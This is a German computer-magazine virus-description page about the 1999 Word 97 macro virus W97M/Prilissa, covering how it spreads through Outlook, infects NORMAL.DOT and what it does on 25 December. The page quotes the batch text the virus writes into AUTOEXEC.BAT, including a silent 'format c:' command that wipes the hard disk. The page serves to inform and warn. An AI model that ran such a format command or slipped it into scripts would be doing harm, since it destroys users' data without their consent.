zur�ck zur Hauptseite
english version  english version
letzte Meldungen
Praktische Anleitung zum PC-Eigenbau
Diskussionsforum rund um den PC!
Tests, Infos und W�rterb�cher!

Tips & Trick f�r Microsoft Produkte!
Editoriales - interessante Berichte im Bereich der IT
Viren: Prophylaxe, Erkennung und Entfernung
Infos zu den neuesten DVDs, deren Features und auch zur DVD Hardware
Login zu Deinem pers�nlichen Bereich
Username:
Passwort:
Nur nicht kontaktscheu. Schreiben Sie uns!



 
 Aktuelle Testberichte 

Direkt zum Video!
Shark Zone H30
Gaming Headset
Direkt zum Video!
Belkin Charge Dock für
Apple Watch/iPhone
Direkt zum Tes!
TrekStor SufTab duo W1
Volks-Tablet
Direkt zum Test!
BABYLON-PRO

EPSON DX3850

UMFRAGE
Kaufst Du PC, Handy etc. Elektronikartikel bei Lebensmittel-Discountern?
Sehr oft
Nur bei Super-Angeboten
Nein, aber ich achte darauf
aus Prinzip nicht
simyo - Weil einfach einfach einfach ist.
 Testberichte 
H�ttest Du's gewu�t?
Start ohne Netzwerkanmeldung
AAPC zeigt, wie's geht!
 Viren 
71 Aktuelle Schn�ppchen
AAPCSI
Der All About PC Schn�ppchen Index: Statistik: Anzahl Schn�ppchen pro Tag
AAPC Newsletter
 Neues aus dem Forum 
FOREN BEI AAPC:   HARDWARE   SOFTWARE   DVD


Gefahr

   

 Verbreitung 

   

Name des Virus

W97M/Prilissa

Typ

Makrovirus

Varianten

W97M/Moslem.A, W97M/Pri.q,
W97M/Melissa-ag, W9

Infizierung:
Prilissa infiziert Word 97-Dateien und verbreitet sich über Outlook. Er verschickt sich selbst in einer Email mit dem Betreff „Message from “ und dem Text „This document is very important and you’ve GOT to read this!!!“. Diese Email wird einmalig bei einer Infizierung automatisch an die ersten 50 (!!) Einträge in Ihrem Adreßbuch weitergeschickt.

Schadensroutine:
Nach der Absendung der 50 Emails infiziert der Virus die NORMAL.DOT, so daß jedes neu geöffnete oder gespeicherte Word-Dokument infiziert wird. Am 25. Dezember tritt die eigentliche Schadensroutine in Kraft. Prilissa überschreibt die AUTOEXEC.BAT mit Text und einem Formatierungsbefehl für das Laufwerk C:

@echo off
@echo Vine...Vide...Vice...Moslem Power Never End...
@echo Your Computer Have Just Been Terminated By -= CyberNET =- ‘Virus !!!
ctty nul
format c: /autotest /q /u

Beim nächsten Neustart wird die Festplatte dann gelöscht. Windows NT-PCs sind hierbei nicht betroffen (diese haben keine AUTOEXEC.BAT). Desweiteren erscheint ebenfalls am 25. Dezember in Word 97 die Meldung "(C) 1999 - CyberNET Vine... Vide... Vice... Moslem Power Never End... You Dare Rise Against Me... The Human Era is Over, The CyberNET Era Has Come!!! [OK]". Nach einem Klick auf [OK] erscheinen einige Figuren in verschiedenen Farben und Formen im geöffneten Worddokument und es wird ein neuer Registrierungseintrag in „HKEY_CURRENT_USER\Software\Microsoft\Office\” namens „CyberNET“ erzeugt. Dieser erhält den Wert „(C)1999 - Indonesia by AnomOke!“. Dieser Eintrag stellt sicher, daß die Emails an die 50 ersten Outlookadressen nur einmal versendet werden.

Bemerkungen:
Das Auslösedatum, der in Word 97 angezeigte Text und ein Registrierungseintrag deuten darauf hin, daß der Virenautor ein sehr religiöser Indonesier ist.

 Zurück 
 Zur Virenübersicht 
 Virusbeschreibung per Email senden 
 Virusbeschreibung ausdrucken 

Copyright liegt bei All-About-PC. Alle Rechte vorbehalten.
Alle Information auf dieser Website durch All-About-PC urheberrechtlich geschützt. Reproduktion und Vertrieb in jeglicher Form ohne Zustimmung der Redaktion sind verboten. 
Wiewohl alle Informationen auf dieser Website streng recherchiert und weitestgehend durch Sekundärquellen gegengeprüft und bestätigt werden, kann für den Inhalt und daraus etwaig entstehenden Schaden keine Verantwortung übernommen werden.